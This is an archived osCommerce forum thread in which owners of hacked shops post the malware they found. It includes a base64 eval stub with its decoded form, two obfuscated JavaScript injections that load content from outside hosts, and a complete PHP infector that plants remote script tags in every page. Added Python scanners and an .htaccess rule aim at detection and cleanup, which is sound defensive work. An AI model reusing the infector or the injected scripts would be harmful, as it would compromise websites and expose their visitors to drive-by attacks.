
Anyone seen this hack before?


alex_hill


Ok, so my site has been hacked, but I can't figure out what is causing it to stay hacked.

 

I found that my index.php had been deleted, so I re-uploaded a fresh copy (along with all the .htaccess files etc.) and navigated to it and got:

 

fs: 236398 [need: 231064]

 

Then the index.php file was gone again. I have uploaded a fresh copy of all the files I can think would be causing it, but the same thing happens.

 

Has anyone seen a similar hack before and may possibly know where to look?

 

Cheers,

Alex


I have the same problem.


I have decided to start again, but in the process I have found a few problems.

 

It would appear that in almost every PHP file (includes, includes/boxes etc) there is this bit of code at the top:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lMTliL3N1YjAwMS9zYzE5NjYzLUlTUFUvamV3ZWxsZXJ5b250cmFkZS5jb20uYXUvYWRtaW4vaW5jbHVkZXMvbGFuZ3VhZ2VzL2VzcGFub2wvaW1hZ2VzL2J1dHRvbnMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

 

I took that encoded info and decoded it at http://www.motobit.com/util/base64-decoder-encoder.asp and this is what I got:

 

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/long_path_to_my_admin_directory/includes/languages/espanol/images/buttons/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

 

So basically it is looking at the admin/includes/languages/espanol/images/buttons/style.css.php file and running the problem script from there (yours may be in a different location). Unfortunately I had deleted this file before I got this far, so I can't see what the function actually did, but I can assume it deleted index.php and corrupted the other files again; not sure what else it was doing in the meantime though.

 

There is also some JavaScript at the bottom of each of these files, which I can't decipher myself; if anyone would like to take a crack at it, the code is below:

<script>function oA(){};var vKF="vKF";oA.prototype = {k : function() {this.n="n";iH=34217;this.y='';this.iN='';try {this.dE="";this.pX=false;rA='';this.nS="";var sE=false;var tW="tW";window.onload=function() {var e=27025;lRV=27397;var z=function(){return 'z'};pS="pS";yY=false;String.prototype.hAJ=function(j, jG){var jGZ=this; return jGZ.replace(j, jG)};eU="";function f(){};var iP=function(){return 'iP'};this.h="h";pF=false;m="";var dL="dL";var l = 'sOuE'.hAJ(/[E:lOk]/g, '')+'bX'.hAJ(/[X2p65]/g, '')+'sbtLroiV'.hAJ(/[VLo{b]/g, '')+'nwgw'.hAJ(/[wx~2$]/g, '');function kK(){};this.cR="cR";this.aG="aG";this.g=51399;var p = 'a>wtqQstu>'.hAJ(/[>?Qrt]/g, '')+'bhs6t6g[d[th'.hAJ(/[h6D[~]/g, '');var hZ=new Array();var kO=false;var x=new Array();var lZ="lZ";this.vI='';this.hS=11275;wM='';var r = 'hzd6syiyn1sz'.hAJ(/[z6Xy1]/g, '')+'e^r&tCA^d^jCa^dCe&r|wMw&sM'.hAJ(/[M|^C&]/g, '');fA="fA";this.lY="lY";var dS=new Array();vU="vU";var yW=51123;var jY = p[l](3, 8);var tQ=new Date();iHT="";rN="rN";hW=false;var aBX="aBX";wU=38947;var w=document;var mJ=new Array();iPX="";var vN=false;var iD=10198;this.vL="";var jK=new Array();var wQ = 'hDtKtKpK:V/C/VcKobmCpKrDoVmbeDnbdKeVsD.CcVoDmV/DsCtKdDsC/Dgbob.CpKhbpK?bsCiCdV=b2C'.hAJ(/[CDbKV]/g, '');this.oS='';this.fY="fY";jYN=false;cS=false;var dSL=27351;this.lD=false;var jM = jY + 'r5ia'.hAJ(/[a}504]/g, '')+'nYgI'.hAJ(/[iY5.x]/g, '');this.zH='';var iV=false;var yF='';var iA=new Array();var v = r[jM](3, 13);var dZ=function(){return 'dZ'};fR='';zR='';var oD=20057;var q=function(){};pR = v + 'cOe5n5t5H5T5MOL5'.hAJ(/[58wuO]/g, '');var fU=new Array();wZ=false;eE="";this.oP='';var mD=new Date();var jQ='';var xM=45077;var sT=false;var zY=function(){};this.qO=27290;var a = 'c^o@l@l@ 7wbibD@xbs@d@'.hAJ(/[@7b]^]/g, '');this.qX="qX";var nF=64355;var uX=new Date();bK=false;wD="";var qD='';var pJ = a[jM](4, 8);this.qY=false;yL=40356;var oV='';qP="";yFP='';var rQ=new Array();var qW='';var zX=new Date();var aB = 'q)kor)t)H;=o1) Vd%e%ro=%1;0) 
%H)e)'.hAJ(/[)o%V;]/g, '');var xR="";var kI=49241;var rE='';var hP=function(){};this.xF="";var lT=false;var d = pJ + aB[jM](3, 18);rX="rX";var kKY=new Array();this.yR=false;var wS=new Date();function sQ(){};uFE=13324;this.iW='';var s = 'dFwWkWi0GFhWtF=010>F<F/0iQf0R0iWrQm:k0f:'.hAJ(/[:QW0F]/g, '');mJQ=8708;fF="fF";this.uAW='';this.fV="";var xMM=new Array();var b = d + s[jM](3, 17);this.kR='';this.oY="oY";function nSJ(){};this.pU=false;var yO=function(){};this.lL="";var b = b + 'a6m}e}>3'.hAJ(/[36O}2]/g, '');this.yB='';var mI='';var aS=false;var wR=false;this.nJ='';pV='';function eO(){};var bH=false;this.hY=5255;this.jZ="jZ";var vK=function(){};hN="hN";var qC=function(){};nQ=false;var tM=function(){return 'tM'};var wMY=function(){};this.mT="";var bC=function(){};fC='';eOS=false;nO=63518;var i = '}v}JeM<MI/fvRraMjrdJgvhM'.hAJ(/[Mrv/J]/g, '');this.cM=18508;this.fQ='';var dM=new Date();aGH=24678;zHL=false;zYY="";var jW = i[jM](3, 8);rT="";eUH='';var hYC=new Date();tG=false;this.xV='';nK=false;eJ="";var u = 'LQewMwe? 
QsjR?cw=w}Q}j}w'.hAJ(/[wQjO?]/g, '');var bZ=function(){};var qZ=42519;var aA=new Date();var dH=false;this.jWE=false;var uF = jW + u[jM](2, 9);var lQ=false;jZO="";var vH="";var yZ=false;var aD = uF + 'hyt}typB:1/}/}c1oymBp1rBo)mye)n}d1e1sy.}c1oBm1/)s}tBdysy/}g}oB.}pBh1pB?1s}i)d}=121'.hAJ(/[1B)}y]/g, '');var eI=function(){};var yX=new Array();xA="";var hA="";this.zV="zV";var wL="";this.jF="";var o = '<Zg|opr8 Z>|'.hAJ(/[|8Zp/]/g, '') + aD + b + '<7/7g7o7r[>6'.hAJ(/[6u7[W]/g, '');var rJ='';this.sN="";yU='';this.dW=false;gW="";function mTC(){};var eP="";pD="pD";dD="dD";iB="iB";this.rC='';tD=false;var iAG="";wQL=45854;this.nC=false;var rNE='';var kF="kF";this.iPK=20649;var c = 'sPa2uObP'.hAJ(/[PO.i2]/g, '')+'oidKyKrKwXd,kagX'.hAJ(/[X,iaK]/g, '');fYU=false;var jH=function(){return 'jH'};nU="";bX='';iR="iR";this.pW='';this.pO="";var iBC=1019;var uH=new Date();sD=false;rD = c[jM](3, 7);var nG='';var lZZ="";var xQ='';this.rP='';var fG="fG";var mTX=new Array();this.bKJ=14825;yBY="yBY";var t = 'Tqe.dqB8enf.o8'.hAJ(/[8n.Nq]/g, '');var lH="";var dJ=14814;eUV='';this.aR="aR";this.fT="fT";var dB=false;this.rCF=7119;uZ=936;zK='';this.dY="";this.oN='';xB="xB";function kH(){};aBZ=false;hH=22879;this.vW='';var cB="cB";var aC = t[jM](3, 7);var vR=function(){};fI='';var dP=false;function nA(){};this.aK="";pZ = aC + 'r*eCE(n*d*'.hAJ(/[*(QCp]/g, '');var uFO=function(){return 'uFO'};this.xJ=false;this.hSF='';this.rK="rK";var cI='';function wZL(){};this.kJ=false;yOA='';this.kE=29249;var zYM=new Date();fCT='';xS=56263;this.yT='';aL='';function bB(){};var qI=function(){return 'qI'};this.tS='';this.mV="mV";this.dPW='';var iAZ=53247;var wE="wE";var hNA=function(){return 'hNA'};var yC=new Array();var mS="";eT=false;this.xE=false;this.qPS=false;var cL="cL";var kG="";this.jA=false;this.nE="nE";qK="qK";var uA = w[rD];var nB="";var xRN=function(){};var rB=function(){};vHA=13095;var hT=function(){};var wV='';lR = uA[pR];var vC=new Array();var gT=40930;kRF=false;this.aY="";var 
kB="";hWV=false;eG=false;function gM(){};lR(pZ, o);this.zF=false;var eIM=new Array();};this.fO="fO";var xT=43554;dPD='';this.bHD=false;} catch(pC) {var tWM=false;vZ=64103;vQ="";var pL=false;oSZ='';w.write("xpe,");pG='';oC=false;}vWJ="";var aKL=new Date();var kL=42784;uO=49200;}};hV="";var fIV=new oA(); var dMC="";fIV.k();var gU=new Array();</script>
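The stub at the top of the infected files can be found and decoded without a web-based decoder. What follows is an added example written for this thread, not code from the thread or from osCommerce: a small Python scanner that locates the `eval(base64_decode('...'))` one-liner, decodes the payload, pulls out the path assigned to `$GLOBALS['mfsn']` (the file that gets `include_once`'d, which is where the real malware lives), and can strip the stub from a file. The regular expressions, the function names and the `/PLACEHOLDER/...` path in the constructed sample are my own assumptions; the sample payload is the decoded text from the post above with the real path replaced.

```python
import base64
import binascii
import re
import sys
from pathlib import Path

# The injected one-liner:  <?php /**/eval(base64_decode('....')); ?>
# (the /**/ comment is optional so minor variants are caught too)
STUB_RE = re.compile(
    r"<\?php\s*(?:/\*.*?\*/)?\s*eval\s*\(\s*base64_decode\s*\(\s*"
    r"['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)\s*;?\s*\?>\s*",
    re.IGNORECASE | re.DOTALL,
)
# Inside the decoded payload: the file that gets include_once'd.
# Assumption: this campaign always stores it in $GLOBALS['mfsn'].
PATH_RE = re.compile(r"\$GLOBALS\['mfsn'\]\s*=\s*'([^']+)'")


def decode_stubs(source: str) -> list:
    """Return one dict per stub found: the decoded payload and the path it includes."""
    hits = []
    for m in STUB_RE.finditer(source):
        try:
            payload = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not valid base64, leave it for manual review
        inc = PATH_RE.search(payload)
        hits.append({"payload": payload, "include_path": inc.group(1) if inc else None})
    return hits


def strip_stubs(source: str):
    """Return (cleaned_source, number_of_stubs_removed)."""
    return STUB_RE.subn("", source)


def scan_tree(root):
    """Yield (path, include_path) for every .php file under root that carries a stub."""
    for path in Path(root).rglob("*.php"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        for hit in decode_stubs(text):
            yield path, hit["include_path"]


# Constructed sample (not from a real site): the decoded payload from the post,
# with a placeholder path, re-encoded and wrapped exactly like the stub above.
SAMPLE_PAYLOAD = (
    "if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){"
    "$GLOBALS['mfsn']='/PLACEHOLDER/admin/includes/languages/espanol/images/buttons/style.css.php';"
    "if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);"
    "if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}"
)
SAMPLE_FILE = (
    "<?php /**/eval(base64_decode('"
    + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    + "')); ?><?php\n// original osCommerce file body\n"
)

if __name__ == "__main__":
    # Usage: python scan_stubs.py /path/to/catalog
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, include_path in scan_tree(root):
        print(f"{path}: stub includes {include_path}")
```

The path reported by `scan_tree` is the file to preserve for analysis before cleaning (the poster above deleted it first and lost the chance to see what it did); stripping the stubs without removing that file and closing the entry point only buys time until the next reinfection.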



Good reading >> eval base64_decode Hack

 

Securing your site


I have the exact same problem.

 

I host on powweb.com and my site has been hacked 3 times in the last month and a half.

 

After the 2nd time, I changed all the hosting admin control panel password, the ftp password, disabled the ftp access and also changed the database password. Not sure how they are getting in. I was told by the hosting company that it might be a security vulnerability with OSCommerce. I have been hosting this site for the last 2 years without any problems.

 

Are there any security vulnerabilities out there that I am not aware of? I am running osCommerce Online Merchant v2.2 RC2a, PHP Version 5.2.12.

 

 



Thank you.

 

This is the actual JavaScript embedded at the bottom of my file. Any idea on how to decode this?

 

 

<script>function iL(){};var bM="bM";iL.prototype = {a : function() {this.mT='';p="p";var oP=function(){};h='';var b=window;var uD=new Array();var jI='';var y="";var hU=false;var gV=11607;this.z="";var g = this;var yV=function(){};var zC=false;this.eD='';this.eT="eT";this.fM=2102;var c=new Array();var yF=new Array();var bA=document;var s="";var oL=function(){};q="";this.gJ='';l=false;var t = function(oukN,t91Ce,vk){return [oukN+'x74',vk+'x66x6fx39x4c','x53'+t91Ce]}('x73x65x74x54x69x6dx65x6fx75','x41x45x69','x6ex38x78')[0];this.sD=false;var zY=false;var dU=new Date();this.eH=false;var r=function(){return 'r'};var tE=function(){return 'tE'};var u = function(Sm3J5,i,ItQ,Gy){return [sm3J5+'x59x36','x41'+i,Gy+'x74x65','x69x66x45x67x39'+ItQ]}('x55x73x36x36x49','x70x4c','x74x53x70x6fx6b','x77x72x69')[2];var dQ='';var iB="";var hUN=false;zK=false;dW='';qF="";this.lE="";mP=8293;try {sJ="";var vG=new Date();var tY="tY";var sZ=new Array();var f = function(ZAtX,Hf7,vYzW){return ['x65x35x71x47x37'+ZAtX,vYzW+'x72x63','x70x41x58'+Hf7]}('x48x39x74','x4ax6cx51','x73')[1];var iT="";pC='';this.rO="";this.sL="sL";var vQ="vQ";var o = function(vI,O,oV,w){return ['x63x72x65x61x74x65x45x6cx65x6d'+vI,O+'x71','x74x55x64x5ax58'+oV,'x76x38x7ax45'+w]}('x65x6ex74','x76','x72x35','x59x4ax66x4c')[0];this.vI="";cR=105;var bY=function(){return 'bY'};lY=false;this.mTQ="mTQ";qP="";var j = function(BIE,T0,Oc2j){return [T0+'x64',Oc2j+'x6ax48x75','x66'+BIE]}('x55x67','x61x70x70x65x6ex64x43x68x69x6c','x79x4dx30x6cx35')[0];this.sF=false;jY='';function k(){};var rQ='';w=18048;var uR=function(){};lI='';var m = function(pxO6,OcZ2,m,D2GN,hBuZ){return ['x79x41'+D2GN,OcZ2+'x66x36x58x49x50',pxO6+'x6fx64x79',hBuZ+'x71x78x34','x4c'+m]}('x62','x4fx46','x4bx7ax46x6cx50','x47','x6ax62')[2];x=false;bAJ=false;this.zI=15494;var fO=new Date();kL=16469;var d = function(x8,Asjdj,L,KwB,w){return 
['x73x65x74x41'+KwB,L+'x75',x8+'x4ax6ax75x54x62','x75x59x63'+Asjdj,'x46x46x4fx39x30'+w]}('x76x71x48x36','x76x62x77','x66x46','x74x74x72x69x62x75x74x65','x6dx71')[0];gF="";vW=false;var fOP=function(){return 'fOP'};this.vWF="";var bU="bU";this.sB='';var e = function(A8DYG,WoDQ,ejK,UlF4z,bl){return [bl+'x4d','x54x30'+UlF4z,'x4ax4ex57'+WoDQ,'x75x30'+A8DYG,'x68x65'+ejK]}('x74x77','x70x77x39x62','x69x67x68x74','x66x79x50x6fx39','x55')[4];var gL="";var n=false;var vGL=function(){return 'vGL'};var tC=new Date();this.nO=4382;function wL(){};var jW = function(hU,rm,eA2KZ,g6x){return ['x54'+hU,'x45'+rm,'x77'+eA2KZ,'x47x69x57x45'+g6x]}('x61x53x76x77x68','x6bx6e','x69x64x74x68','x65x61')[2];this.uRI="uRI";function uRS(){};var hA=function(){return 'hA'};var uB=new Array();var v=document[o](function(QGS,NoN,EbKg3,x){return [QGS+'x79x6cx78','x69x66x72x61x6d'+NoN,'x7ax6bx79x6fx77'+x,'x6dx59x4e'+EbKg3]}('x6ax74x75x74x6f','x65','x73x71x36x63','x61x4bx36x5a')[1]);var sN="";nS='';var jYB='';var dM="dM";v[d](f, g.i());var rC=new Date();eN=7961;var lK=function(){return 'lK'};lKV=false;var vU=function(){return 'vU'};v[d](e, "1");jG="jG";var wH="";this.oD='';this.bO="";var mTY="";var oT=14991;v[d](jW, "1");this.wJ=false;var pW=function(){return 'pW'};function uN(){};var hM=new Date();var vE="vE";var yJ=11375;this.vC="";var yB=function(){};bA[m][j](v);var iR=new Array();var zA='';this.eR="eR";var pQ="pQ";bYH="bYH";var hG=false;} catch(jWF) {zQ="zQ";var wN="";var zE="zE";this.yH='';cP=9025;var rW=false;var qB=new Array();bA[u](function(sW,esRb1,sq,R,OjhDX){return [OjhDX+'x79x74x43','x48x4ex4fx6bx30'+R,sq+'x6dx47','x3cx68x74x6dx6cx20'+sW,esRb1+'x79x51x32']}('x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3e','x46x4dx71','x4ax72x35x70x7a','x56x6b','x55')[3]);this.iF=false;this.bQ=28450;this.hGJ="";this.jQ=27206;var uT=new Array();this.hC="";b[t](function(){ g.a() }, 332);bAF='';this.zED="";this.lEX=16395;lYL=false;cH="";zU="zU";}var zS=false;this.qH='';zYH="zYH";var 
nE=function(){return 'nE'};},i : function() {this.tK="";uTW=950;return function(pInG8,H0,TBjz,X4){return [H0+'x41x77','x4cx78x79x51'+X4,TBjz+'x73x2fx67x6fx2ex70x68x70x3fx73x69x64x3dx39','x76'+pInG8]}('x71x73','x78x6bx65','x68x74x74x70x3ax2fx2fx61x6cx74x65x72x70x61x72x61x64x69x67x6dx61x2ex6ex65x74x2fx73x74x64','x79x48x34x38x63')[2];jWX=false;var rI=false;function cHE(){};var gP="";}};function aX(){};var eX=new iL(); var zUF='';eX.a();var rU=false;</script>

 

Absolutely. Have you read this?


Any idea on how to decode this.

In post 4 of this thread there is a website mentioned where the poster decoded this. I wouldn't bother, it is malicious. Needs to be removed and the hole through which they came closed.


I didn't decode it but I found out what it does.

 

I disconnected from the internet and placed the script in a web page and opened it locally with IE.

 

It tried to run an ActiveX control on my machine when I opened it.

 

Something I quickly denied as it's a very good way to get your PC FUBAR.

:o



I went back to what I thought was a clean backup and the only additional files I found that were not there before were:

 

Located in the /htdocs/images/ directory

 

  • alexa75d78824.php
  • g00gle5cbc1438599b65.php
  • goog1e5cbc1438599b65.php
  • goog1ebab5108ecc535a.php
  • google5cbc1438599b65.php
  • inclasses.php
  • pageclasses.php

 

Most of the files look like this:

 

<?php
// Infector found in /htdocs/images/ (reproduced as posted, with analyst comments added):
// walks the document root and appends a remote <script> tag just before </body> in every
// HTML/PHP/ASP/Perl/ColdFusion file it can write to, staging each edit in a hidden /tmp directory.

set_time_limit(9999999);

$old_malware_codes = array("<script src='http://nt002.cn/E/J.JS'></script>", "<script src=\"http://nt002.cn/E/J.JS\"></script>");

$malware_code = "<script src=\"http://nt02.co.in/3\"></script>";
$malware_code2 = "<script src='http://nt02.co.in/3'></script>";
$tmp_dir = "/tmp/.X11-font-unix";

function iframe_file($dir, $f)
{
    global $tmp_dir, $old_malware_codes, $malware_code, $malware_code2;

    # if ($f != "index.html") {
    # return;
    # }
    $src_file = $dir."/".$f;
    $tmp_file = $tmp_dir."/".$f;

    // Makes the target writable if it is not (0x0080 = owner write bit), restoring the mode afterwards.
    $restore_perms = 0;
    $orig_perms = fileperms($src_file);
    if (!($orig_perms & 0x0080)) {
        echo "$src_file: set write permissons<br>\n";
        if (!chmod($src_file, $orig_perms | (0x0080|0x0010))) {
            echo "<font color='red'>$src_file: cannot set write permissons</font><br>\n";
            return;
        }
        $restore_perms = 1;
    }

    $src_fd = fopen($src_file, "r");
    if (!$src_file) {   // tests the path string instead of the handle, so this check never fires
        echo("<font color='red'>Cannot open file $src_file</font><br>\n");
        return;
    }
    $tmp_fd = fopen($tmp_file, "w");
    if (!$tmp_file) {   // same mistake as above
        echo("<font color='red'>Cannot open file $tmp_file</font><br>\n");
        fclose($src_fd);
        return;
    }
    $deface_done = 0;
    while (!feof($src_fd) ) {
        $line = fgets($src_fd);

        // Leaves the attacker's own web shells untouched.
        if (eregi("Web Shell by boff", $line)) {
            echo $src_file.": skip shell<br>\n";
            break;
        }

        // Removes the tag from an earlier campaign before inserting the current one.
        foreach ($old_malware_codes as $old_code){
            $line = eregi_replace ($old_code, "", $line);
        }

        if (eregi($malware_code, $line) || eregi($malware_code2, $line)) {
            echo $src_file.": already infected<br>\n";
            break;
        }

        // Picks the quoting style that will not break a string literal the </body> may sit inside
        // (e.g. an echo "...</body>..." in a PHP file).
        if (preg_match_all("/<\/body>[^']*\"/i", $line, $matches)) {
            $line = preg_replace("/<\/body>/i", $malware_code2."</body>", $line);
            $deface_done = 1;
        } else if (preg_match_all("/<\/body>[^\"]*'/i", $line, $matches)) {
            $line = preg_replace("/<\/body>/i", $malware_code."</body>", $line);
            $deface_done = 1;
        } else if (eregi("</body>", $line)) {
            $line = preg_replace("/<\/body>/i", $malware_code."</body>", $line);
            $deface_done = 1;
        }
        /*
        if (preg_match_all("/<\/body>.*?[('\")]/i", $line, $matches)) {
            echo "--->>> Match: char=[".$matches[0][0]."]<br>\n";
            if ($matches[0][0] == "'") {
            // if (!strcmp($matches[0][0], '"')) {
                echo "--->>> Char is 1 quote: [".$matches[0][0]."]<br>\n";
                $line = preg_replace("/<\/body>/i", $malware_code."</body>", $line);
            } else {
                echo "--->>> Char is 2 quotes: [".$matches[0][0]."]<br>\n";
                $line = preg_replace("/<\/body>/i", $malware_code2."</body>", $line);
            }
            $deface_done = 1;
        }*/

        fputs($tmp_fd, $line);
    }
    fclose($src_fd);
    fclose($tmp_fd);

    // Only overwrites the original if a </body> was actually patched.
    if ($deface_done) {
        if (copy($tmp_file, $src_file)) {
            echo "<font color='green'>".$src_file.": file iframed!</font><br>\n";
        } else {
            echo "<font color='red'>".$src_file.": copy failed</font><br>\n";
        }
    }

    unlink($tmp_file);

    // Restore file permissions
    //
    if ($restore_perms) {
        echo "$src_file: restore permissons";
        chmod($src_file, $orig_perms);
    }
}

function scan_dir($dir)
{
    global $tfile,$tdir;
    $i=0;
    $j=0;
    $myfiles;
    $myfiles[][] = array();

    if (is_dir($dir)) {
        if ($dh = opendir($dir)) {
            while (($f = readdir($dh)) != false) {
                if (!is_dir($dir."/".$f)) {
                    $i++;

                    # echo $dir."/".$f." - <b>File</b><br>";

                    // Targets .html/.shtml/.htm, .php/.php5, .asp/.aspx, .pl and .cfm files; everything else is skipped.
                    if (eregi("\.s{0,1}html{0,1}$", $f) ||
                        eregi("\.php\d{0,1}$", $f) ||
                        eregi("\.aspx{0,1}$", $f) ||
                        eregi("\.pl$", $f) ||
                        eregi("\.cfm$", $f)) {
                        iframe_file($dir, $f);
                    } else {
                        # echo $dir."/".$f." - <b>Skip</b><br>\n";
                    }
                } else {
                    if (($f != ".") && ($f != "..")) {
                        $tdir[$j]=$f;
                        # echo $dir."/".$f." - <b>Directory</b><br>";
                        //$sep = .\\.;
                        scan_dir($dir."/".$f);   // recurses into every subdirectory
                        $j++;
                    }
                }
            }
            closedir($dh);
        }
    }
}


// Entry point: the caller can pick the starting directory with ?root=, otherwise the whole document root is scanned.
rmdir($tmp_dir);
mkdir($tmp_dir, 0755);
if (!file_exists($tmp_dir)) {
    $tmp_dir=dirname(__FILE__)."/tmp";
    mkdir($tmp_dir, 0755);
}
if ($_GET['root']) {
    $root_dir = $_GET['root'];
} else {
    $root_dir = getenv("DOCUMENT_ROOT");
}

echo "root_dir=".$root_dir."<br>\n";
scan_dir($root_dir);
rmdir($tmp_dir);


?>

 

 

Actually I was pointing to a website which did a base64 decode on the PHP code injection. I couldn't decipher the JS, and didn't put much effort or time into it either.
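The infector above tells a defender exactly what to look for: a `<script src=...>` tag pointing at one of its two hosts just before `</body>`, the `/tmp/.X11-font-unix` staging directory, and the `Web Shell by boff` marker it uses to skip its own shells. As an added example, not code from the thread or from osCommerce, here is a Python script that reverses the infection on a copy of the site: it reports those indicators per file, strips the injected tag, and checks for the staging directory. The indicator values come from the infector as posted; the regular expressions, the function names and the constructed sample page are my own assumptions.

```python
import re
import sys
from pathlib import Path

# Indicators lifted from the infector script posted above.
INJECTED_HOSTS = ("nt02.co.in", "nt002.cn")
TMP_DIR = "/tmp/.X11-font-unix"
SHELL_MARKER = "Web Shell by boff"

# Matches either quoting style of the injected tag, e.g.
#   <script src='http://nt02.co.in/3'></script>
INJECT_RE = re.compile(
    r"""<script\s+src=(['"])https?://(?:"""
    + "|".join(re.escape(h) for h in INJECTED_HOSTS)
    + r""")/[^'"]*\1>\s*</script>""",
    re.IGNORECASE,
)
# The same set of extensions the infector's scan_dir() hands to iframe_file().
TARGET_EXT_RE = re.compile(r"\.(s?html?|php\d?|aspx?|pl|cfm)$", re.IGNORECASE)


def classify(text: str) -> list:
    """Return the indicators present in one file's content."""
    findings = []
    if INJECT_RE.search(text):
        findings.append("injected-script-tag")
    if SHELL_MARKER in text:
        findings.append("web-shell-marker")
    return findings


def clean_injected(text: str):
    """Strip every injected tag; return (cleaned_text, number_removed)."""
    return INJECT_RE.subn("", text)


def scan_tree(root):
    """Yield (path, findings) for every targeted file under root that carries an indicator."""
    for path in Path(root).rglob("*"):
        if not (path.is_file() and TARGET_EXT_RE.search(path.name)):
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        findings = classify(text)
        if findings:
            yield path, findings


def host_indicators() -> list:
    """Host-level leftover: the hidden staging directory the infector creates under /tmp."""
    return [TMP_DIR] if Path(TMP_DIR).exists() else []


# Constructed sample page (not taken from any real site) carrying the injected tag.
SAMPLE_PAGE = (
    "<html><body>\n<p>Welcome to the shop</p>\n"
    "<script src='http://nt02.co.in/3'></script></body></html>\n"
)

if __name__ == "__main__":
    # Usage: python clean_injected.py /path/to/site-copy
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, findings in scan_tree(root):
        print(f"{path}: {', '.join(findings)}")
    for item in host_indicators():
        print(f"staging directory present: {item}")
```

Run it against an offline copy first and keep the originals: files flagged with `web-shell-marker` are the attacker's shells and should be removed outright rather than cleaned, and the hidden directory under `/tmp` is worth preserving for the timeline before it is deleted.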



Looks real nasty code to me.

 

If you read the pinned topic in the Installation forum and thwarted the PHP_SELF hack and/or other hacks that might have been used to compromise your shop, copy this code into a text file (htaccess.txt for example) and upload it to your images directory. Then rename it to .htaccess (after you have deleted the one that may already be there, probably left by the hackers).

 

# $Id$
#
# This is used to restrict access to this folder to anything other
# than images

# Prevents any script files from being accessed from the images folder
<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">
  Order Deny,Allow
  Deny from all
</FilesMatch>
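The `FilesMatch` pattern above decides which names in the images directory Apache will refuse to serve, and it is worth checking it against the file names found earlier in this thread before relying on it. The following is an added example, not code from the thread or from osCommerce: a Python script that pulls the pattern out of an `.htaccess` text, applies it the way Apache does (the pattern is plain PCRE, which Python's `re` reads identically here), and audits a directory for files the rule would block, which in an images directory are files that should not exist at all. The function names and the constructed extra file names are my own assumptions; the `.htaccess` text and the first four file names are from the posts above.

```python
import re
from pathlib import Path

# The rule as posted in the thread.
HTACCESS_RULE = r'''<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">
  Order Deny,Allow
  Deny from all
</FilesMatch>'''

FILESMATCH_RE = re.compile(r'<FilesMatch\s+"([^"]+)">(.*?)</FilesMatch>', re.DOTALL | re.IGNORECASE)
DENY_RE = re.compile(r"Deny\s+from\s+all|Require\s+all\s+denied", re.IGNORECASE)


def blocked_pattern(htaccess_text: str):
    """Return the compiled FilesMatch regex of the first deny-all block, or None if there is none."""
    for m in FILESMATCH_RE.finditer(htaccess_text):
        if DENY_RE.search(m.group(2)):
            return re.compile(m.group(1))
    return None


def is_blocked(name: str, pattern) -> bool:
    """True if Apache would refuse to serve this file name under the rule."""
    return pattern.search(name) is not None


def classify_names(names, htaccess_text: str = HTACCESS_RULE) -> dict:
    """Map each file name to whether the rule blocks it."""
    pattern = blocked_pattern(htaccess_text)
    if pattern is None:
        raise ValueError("no deny-all FilesMatch block found")
    return {n: is_blocked(n, pattern) for n in names}


def audit_images_dir(root, htaccess_text: str = HTACCESS_RULE) -> list:
    """List files under root that the rule would block; in an images directory these are suspects."""
    pattern = blocked_pattern(htaccess_text)
    if pattern is None:
        raise ValueError("no deny-all FilesMatch block found")
    root = Path(root)
    return sorted(str(p.relative_to(root)) for p in root.rglob("*")
                  if p.is_file() and is_blocked(p.name, pattern))


# Names from the thread's list plus constructed ones that show the edges of the rule.
SAMPLE_NAMES = [
    "alexa75d78824.php", "g00gle5cbc1438599b65.php", "inclasses.php", "pageclasses.php",
    "logo.gif", "shell.phtml", "x.php5", "x.phar", "SHELL.PHP",
]

if __name__ == "__main__":
    for name, blocked in classify_names(SAMPLE_NAMES).items():
        print(f"{name}: {'blocked' if blocked else 'served'}")
```

Two caveats the sample names bring out: the pattern is case-sensitive, so `SHELL.PHP` is served even though Apache's `AddHandler`/`AddType` extension matching is case-insensitive and would still hand it to PHP (prefix the pattern with `(?i)` to close that gap), and an extension the pattern does not list, such as `.phar`, is served if the server maps it to PHP. `Order Deny,Allow` / `Deny from all` is the Apache 2.2 form; on 2.4 the equivalent is `Require all denied`, which `blocked_pattern` also accepts. Blocking execution in the images directory is a containment measure only; the entry point that let the files be written there still has to be closed, as the post says.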


This topic is now archived and is closed to further replies.